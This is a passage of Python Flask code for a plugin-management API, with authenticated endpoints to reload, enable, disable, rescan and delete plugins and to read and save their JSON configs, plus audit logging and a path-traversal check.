return jsonify({'error': 'Invalid plugin id'}), 400
|
|
plugins_path = Path(PLUGINS_DIR) / plugin_id
|
|
if not plugins_path.exists() or not (plugins_path / 'manifest.json').exists():
|
|
return jsonify({'error': 'Plugin not found'}), 404
|
|
|
|
unload_plugin(plugin_id)
|
|
ok, err = load_plugin(current_app._get_current_object(), plugin_id)
|
|
_set_plugin_state(plugin_id, True, error=err)
|
|
|
|
usr = getattr(request, 'session', {}).get('user', 'system')
|
|
log_audit(usr, 'plugins.reloaded', f"Reloaded plugin: {plugin_id}")
|
|
|
|
if ok:
|
|
mod = _loaded_plugins.get(plugin_id)
|
|
if mod and hasattr(mod, 'start_background_tasks'):
|
|
try: mod.start_background_tasks()
|
|
except Exception: pass
|
|
return jsonify({'success': True})
|
|
return jsonify({'success': False, 'error': err}), 500
|
|
|
|
|
|
@bp.route('/api/plugins/<plugin_id>/enable', methods=['POST'])
|
|
@require_auth(perms=['plugins.manage'])
|
|
def enable_plugin(plugin_id):
|
|
"""Enable and load a plugin at runtime"""
|
|
if not _valid_plugin_id(plugin_id):
|
|
return jsonify({'error': 'Invalid plugin id'}), 400
|
|
plugins_path = Path(PLUGINS_DIR) / plugin_id
|
|
if not plugins_path.exists() or not (plugins_path / 'manifest.json').exists():
|
|
return jsonify({'error': 'Plugin not found'}), 404
|
|
|
|
# load at runtime — no blueprint needed, uses catch-all route
|
|
ok, err = load_plugin(current_app._get_current_object(), plugin_id)
|
|
_set_plugin_state(plugin_id, True, error=err)
|
|
|
|
usr = getattr(request, 'session', {}).get('user', 'system')
|
|
log_audit(usr, 'plugins.enabled', f"Enabled plugin: {plugin_id}")
|
|
|
|
if ok:
|
|
# start background tasks
|
|
mod = _loaded_plugins.get(plugin_id)
|
|
if mod and hasattr(mod, 'start_background_tasks'):
|
|
try:
|
|
mod.start_background_tasks()
|
|
except Exception:
|
|
pass
|
|
return jsonify({'success': True, 'message': f'Plugin {plugin_id} enabled and loaded.'})
|
|
else:
|
|
return jsonify({'success': False, 'error': err}), 500
|
|
|
|
|
|
@bp.route('/api/plugins/<plugin_id>/disable', methods=['POST'])
|
|
@require_auth(perms=['plugins.manage'])
|
|
def disable_plugin(plugin_id):
|
|
"""Disable and unload a plugin"""
|
|
if not _valid_plugin_id(plugin_id):
|
|
return jsonify({'error': 'Invalid plugin id'}), 400
|
|
unload_plugin(plugin_id)
|
|
_set_plugin_state(plugin_id, False)
|
|
|
|
usr = getattr(request, 'session', {}).get('user', 'system')
|
|
log_audit(usr, 'plugins.disabled', f"Disabled plugin: {plugin_id}")
|
|
|
|
return jsonify({'success': True, 'message': f'Plugin {plugin_id} disabled.'})
|
|
|
|
|
|
@bp.route('/api/plugins/rescan', methods=['POST'])
|
|
@require_auth(perms=['plugins.manage'])
|
|
def rescan_plugins():
|
|
"""Rescan plugins/ directory for new or removed plugins"""
|
|
discovered = _discover_plugins()
|
|
usr = getattr(request, 'session', {}).get('user', 'system')
|
|
log_audit(usr, 'plugins.rescan', f"Rescanned plugins directory: {len(discovered)} found")
|
|
return jsonify({'success': True, 'count': len(discovered), 'message': f'{len(discovered)} plugin(s) found.'})
|
|
|
|
|
|
@bp.route('/api/plugins/<plugin_id>', methods=['DELETE'])
|
|
@require_auth(perms=['plugins.manage'])
|
|
def delete_plugin(plugin_id):
|
|
"""Unload, remove state, and delete plugin from disk"""
|
|
if not _valid_plugin_id(plugin_id):
|
|
return jsonify({'error': 'Invalid plugin id'}), 400
|
|
import shutil
|
|
plugins_path = Path(PLUGINS_DIR) / plugin_id
|
|
if not plugins_path.exists():
|
|
return jsonify({'error': 'Plugin not found'}), 404
|
|
|
|
# unload if loaded
|
|
unload_plugin(plugin_id)
|
|
|
|
# remove DB state
|
|
db = get_db()
|
|
db.execute('DELETE FROM plugin_state WHERE plugin_id = ?', (plugin_id,))
|
|
|
|
# delete from disk
|
|
try:
|
|
shutil.rmtree(str(plugins_path))
|
|
except Exception as e:
|
|
return jsonify({'error': f'Failed to delete plugin files: {e}'}), 500
|
|
|
|
usr = getattr(request, 'session', {}).get('user', 'system')
|
|
log_audit(usr, 'plugins.deleted', f"Deleted plugin: {plugin_id}")
|
|
|
|
return jsonify({'success': True, 'message': f'Plugin {plugin_id} deleted.'})
|
|
|
|
|
|
def _safe_plugin_path(plugin_id, filename='config.json'):
|
|
"""Validate plugin_id and return safe path — prevents path traversal"""
|
|
if '..' in plugin_id or '/' in plugin_id or '\\' in plugin_id:
|
|
return None
|
|
resolved = (Path(PLUGINS_DIR) / plugin_id / filename).resolve()
|
|
if not str(resolved).startswith(str(Path(PLUGINS_DIR).resolve())):
|
|
return None
|
|
return resolved
|
|
|
|
|
|
@bp.route('/api/plugins/<plugin_id>/config', methods=['GET'])
|
|
@require_auth(perms=['plugins.manage'])
|
|
def get_plugin_config(plugin_id):
|
|
"""Read plugin config.json as raw text"""
|
|
if not _valid_plugin_id(plugin_id):
|
|
return jsonify({'error': 'Invalid plugin id'}), 400
|
|
config_path = _safe_plugin_path(plugin_id)
|
|
if not config_path:
|
|
return jsonify({'error': 'Invalid plugin ID'}), 400
|
|
if not config_path.exists():
|
|
return jsonify({'error': 'No config.json found for this plugin'}), 404
|
|
try:
|
|
return jsonify({'config': config_path.read_text(encoding='utf-8')})
|
|
except Exception as e:
|
|
return jsonify({'error': safe_error(e)}), 500
|
|
|
|
|
|
@bp.route('/api/plugins/<plugin_id>/config', methods=['PUT'])
|
|
@require_auth(perms=['plugins.manage'])
|
|
def save_plugin_config(plugin_id):
|
|
"""Write plugin config.json — validates JSON before saving"""
|
|
if not _valid_plugin_id(plugin_id):
|
|
return jsonify({'error': 'Invalid plugin id'}), 400
|
|
config_path = _safe_plugin_path(plugin_id)
|
|
if not config_path:
|
|
return jsonify({'error': 'Invalid plugin ID'}), 400
|
|
if not config_path.parent.exists():
|
|
return jsonify({'error': 'Plugin not found'}), 404
|
|
|
|
data = request.get_json() or {}
|
|
raw = data.get('config', '')
|
|
if not raw:
|
|
return jsonify({'error': 'Empty config'}), 400
|
|
|
|
# validate JSON
|
|
try:
|
|
json.loads(raw)
|
|
except json.JSONDecodeError as e:
|
|
return jsonify({'error': f'Invalid JSON: {e}'}), 400
|
|
|
|
try:
|
|
config_path.write_text(raw, encoding='utf-8')
|
|
except Exception as e:
|
|
return jsonify({'error': f'Failed to write: {e}'}), 500
|
|
|
|
usr = getattr(request, 'session', {}).get('user', 'system')
|
|
log_audit(usr, 'plugins.config_saved', f"Updated config for plugin: {plugin_id}")
|
|
|
|
return jsonify({'success': True})
|